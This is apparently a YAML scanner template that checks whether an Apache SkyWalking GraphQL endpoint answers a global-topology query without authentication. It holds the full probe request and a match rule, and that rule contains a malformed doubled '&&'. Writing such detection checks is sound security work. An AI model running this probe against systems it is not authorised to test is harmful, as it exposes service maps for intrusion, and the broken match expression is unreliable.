id: skywalking-unauth
info:
  name: Skywalking Unauth
  risk: High

params:
  - root: '{{.BaseURL}}'

requests:
  - method: POST
    redirect: false
    url: >-
      {{.root}}/graphql
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    body: |
      {"query":"query queryTopo($duration: Duration!) {\n  topo: getGlobalTopology(duration: $duration) {\n    nodes {\n      id\n      name\n      type\n      isReal\n    }\n    calls {\n      id\n      source\n      detectPoints\n      target\n    }\n  }}","variables":{"duration":{"start":"2020-06-05 1004","end":"2020-06-05 1019","step":"MINUTE"}}}
    detections:
      - >-
        StatusCode() == 200 && && StringSearch("resHeaders", "application/json") && StringSearch("response", "topo") && StringSearch("response", "detectPoints")

references:
  - repo: https://github.com/apache/skywalking